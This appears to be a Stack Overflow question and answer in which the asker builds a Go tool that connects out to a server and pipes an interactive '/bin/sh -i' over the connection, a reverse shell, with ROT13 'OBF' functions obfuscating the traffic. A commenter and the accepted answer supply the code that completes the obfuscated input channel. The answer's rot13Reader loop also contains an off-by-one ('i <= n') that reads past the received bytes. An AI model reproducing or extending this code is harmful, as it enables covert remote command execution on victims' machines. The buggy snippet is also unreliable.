# How to capture the bytes of stdin

Tags: go, io, byte, interactive-shell

The goal: I want to capture all the bytes of ***cmd.Stdin*** and process them with this rot13 function: https://play.golang.org/p/VX2pwaIqhmT

The story: I'm coding a small tool which will be cross compiled for both win/ linux, so I'm trying to make it as simple as possible. This tool connects to the server from which I can execute commands on the client.

Since I had to do the same thing for cmd.Stdout, I used this:

```
.......
conn, err := net.Dial(nObj.Type, nObj.TCPIndirizzo)

......

cmd := exec.Command(/bin/sh, "-i") // please keep in mind that this is an ***interactive*** 
//***shell***, and not just a simple command
                                        
cmd.Stdin = conn

cmdStdout, err := cmd.StdoutPipe() // works fine
    if err != nil {
    fmt.Fprintf(os.Stderr, "error creating shell stdout pipe: %s\n", err)

}

cmd.Stderr = conn

err = cmd.Start()
    if err != nil {
        fmt.Fprintf(os.Stderr, "error starting shell: %s\n", err)
    }
.....
err = OBFprocessStream(cmdStdout, conn) // works fine
....
```

Where OBFprocessStream function is based on this one: https://play.golang.org/p/j_TKZWuhGaK. Everything works fine here .

So, I tried to replicate the same thing for cmd.Stdin:

```
.......
conn, err := net.Dial(nObj.Type, nObj.TCPIndirizzo)

......

cmd := exec.Command(/bin/sh, "-i") 
                                        
cmdStdin, err := cmd.StdinPipe() 
    if err != nil {
    fmt.Fprintf(os.Stderr, "error creating shell stdin pipe: %s\n", err)

}

cmdStdout, err := cmd.StdoutPipe()
    if err != nil {
    fmt.Fprintf(os.Stderr, "error creating shell stdout pipe: %s\n", err)

}

cmd.Stderr = conn

err = cmd.Start()
    if err != nil {
        fmt.Fprintf(os.Stderr, "error starting shell: %s\n", err)
    }

.....
err = INOBFprocessStream(cmdStdin, conn)
....

.....
err = OBFprocessStream(cmdStdout, conn)
....
```

But.. cmdStdin is an Io.WriterCloser, and I don't really know what to do to capture the bytes sEGIHOsegoihszrhoiò

Can you please help me?

Comment: You can't capture `cmd.Stdin`, it's an *input* stream to the process, and thus an *output* stream for you. You should *write* to it, or close it.

Comment: @rustyx thanks for the comment! What do you suggest then? The incoming input is ROT13 encoded, so it needs to decode the data. This is the scenario I have in mind: ncat server —> socat does rot13 encode of the commands --> Go tool does rot13 decode of stdin —> Go tool sends data to shell via stdin

Comment: @rustyx little offtopic note: I totally share your point described in your profile, about the decline of SO. I share it so much that I pasted the link in my profile too

Comment: haha, yes, it was worse 5 years ago....

Comment: Try `cmd.Stdin = &rot13Reader{conn}`.

Comment: @rustyx a-m-a-z-i-n-g!(: also if with an issue, it works! The input gets correctly decoded, but somehow the "$" of the interactive shell gets truncated.. why? How can I fix that?

Comment: @rustyx I don't know how was it 5 years ago, but the blog reflectes exactly what still happens today

Comment: @rustyx OK, the error was how I handled server side the rot13 decoding. Please post an answer with an explanation, I will mark it as solution!(:

Answer (score 2, accepted):

So it seems what you actually want is to read the data from `conn`, filter it with ROT13 and then pass it to [`cmd.Stdin`](https://pkg.go.dev/os/exec#Cmd) (which accepts an `io.Reader`).

And your `rot13Reader` is already implementing [`io.Reader`](https://pkg.go.dev/io#Reader):

```
type rot13Reader struct {
    r io.Reader
}

func (r13 *rot13Reader) Read(b []byte) (int, error) {
    n, err := r13.r.Read(b)
    for i := 0; i <= n; i++ {
        b[i] = rot13(b[i])
    }
    return n, err
}
```

So a quick solution can be to construct a small filter chain out of it like so:

```
    cmd.Stdin = &rot13Reader{conn}
```